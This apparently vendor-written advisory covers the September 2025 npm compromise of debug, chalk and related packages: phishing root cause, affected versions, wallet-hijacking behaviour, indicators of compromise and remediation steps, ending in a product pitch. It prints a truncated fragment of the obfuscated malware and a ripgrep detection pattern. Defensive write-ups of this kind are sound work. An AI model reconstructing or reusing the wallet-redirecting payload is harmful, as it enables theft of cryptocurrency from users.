npm Supply Chain Attack: Massive Compromise of debug, chalk, and 16 Other Packages

On September 8, 2025, one of the largest npm supply chain incidents in recent history unfolded. Popular libraries like debug and chalk along with 16 other utilities were hijacked and pushed to npm with malicious code targeting cryptocurrency wallets and blockchain transactions. These packages collectively have billions of weekly downloads, making this compromise both widespread and extremely dangerous.

Timeline of Events

• 13:16 UTC: Malicious versions first published to npm.
  
• ~15:20 UTC: Community identifies suspicious code and raises alerts on GitHub.
  
• Within 2 hours: Maintainers revert to clean versions and unpublish compromised releases.
  
• After discovery: npm flags and locks impacted accounts while developers begin auditing dependencies.

Root Cause: The maintainer confirmed that their npm account was phished through a convincing 2FA reset email sent from a fake domain (npmjs.help). The attacker collected the username, password, and a live TOTP code, then used these to take over the account and publish the malicious versions.

Affected Packages and Versions

The following popular libraries were impacted. If your project uses these, immediately check your lockfiles and deployments:

• [email protected]
  
• [email protected]
  
• [email protected]
  
• [email protected]
  
• [email protected]
  
• [email protected]
  
• [email protected]

• [email protected]
  
• [email protected]
  
• [email protected]
  
• [email protected]
  
• plus several other related dependencies owned by the compromised maintainer account (npmjs.com/~qix).
  

These versions were live for approximately two hours before clean versions replaced them.

A Phish in the npm Stream

The maintainer confirmed that their npm account was phished through a highly convincing 2FA reset email sent from a fake domain (npmjs.help).

The attacker collected the username, password, and a live TOTP code, then used these to fully take over the account and publish malicious versions of widely used packages like debug and chalk.

This single compromise cascaded across the ecosystem in a matter of hours, showing how even one targeted phishing attack can ripple through the entire open-source supply chain.

What the Malware Does

The malicious payload is a browser-only script, meaning it does not infect operating systems or file systems directly. Instead, it focuses on intercepting crypto transactions and web3 API calls in browser environments.

Key behaviors include:

• Wallet Hijacking: Hooks into window.ethereum to intercept calls to wallets like MetaMask and silently redirect outgoing transactions to attacker-controlled addresses.
  
• Network Response Manipulation: Overrides fetch and XMLHttpRequest to scan API responses for blockchain addresses, then replaces them with visually similar attacker addresses using a Levenshtein “nearest match” algorithm.
  
• Multi-Chain Targeting: Supports multiple blockchains, including Ethereum, Bitcoin, Litecoin, Tron, BCH, and Solana.
  
• Stealth Features: Uses obfuscation to hide its presence and exposes developer-like controls under a global object named stealthProxyControl.

const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66ea25['push'](_0x66ea25['shift']());}}}(_0x550a,0x1*-0x1d672f+0x15a079+-0x1699a6*-0x1));var neth=0x5c6*0x2+0x23c4+-0x2f50,rund=-0x1*0x2381+-0x5*0x42d+-0xe*-0x407,loval=-0x
// rest of the malware code

The full script can be found in here.

Indicators of Compromise (IoCs)

Security teams can use the following to hunt for compromise:

• Attacker Ethereum address:
  0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976. You can view live activity related to this address on Etherscan.
  
• Suspicious global variables and functions:
  
  • stealthProxyControl

  • runmask
    
  • newdlocal
    
  • checkethereumw
    
• Ripgrep detection command:
  

rg -u --max-columns=80 _0x112fa8

This searches for unique obfuscated strings used by the malware.

Why This Matters

This attack shows how a single compromised maintainer account can cascade across the ecosystem:

• These libraries are transitive dependencies, meaning they get bundled into countless projects without direct developer awareness.
  
• Even simple utility packages like chalk can become vectors for highly targeted attacks, especially when bundled into browser-facing apps.
  
• The malicious versions were live for only two hours, but the sheer scale of npm meant thousands of developers could have installed them.
  

Steps for Developers

1. Audit Your Dependencies: Check package-lock.json or yarn.lock for the versions listed above.

2. Search for the Malware in Your Codebase:

rg -u --max-columns=80 _0x112fa8

3. Update to Safe Versions: Pin dependencies to patched versions released after the incident.

4. Check for Wallet Exposure: If your app interacts with crypto wallets, rotate keys and alert affected users.

5. Implement Runtime Monitoring: Detect suspicious browser activity like unexpected network rewrites or injected wallet hooks.

How Upwind Protects You

Upwind offers comprehensive protection to guard against threats like this supply chain compromise, including:

• Advanced dependency scanning to automatically identify and flag vulnerable package versions
• Continuous monitoring for suspicious behavior, such as hidden wallet hooks or unexpected network rewrites
• Applied behavioral analytics to uncover obfuscated scripts and unusual client-side activity that might indicate a compromise
• Risk prioritization to ensure that security teams can focus their attention on the most critical vulnerabilities and attacks.

By combining proactive scanning with real-time detection and intelligent prioritization, Upwind enables organizations to stay ahead of even the fastest-moving supply chain attacks.

For support in identifying compromised packages, reach out to [email protected].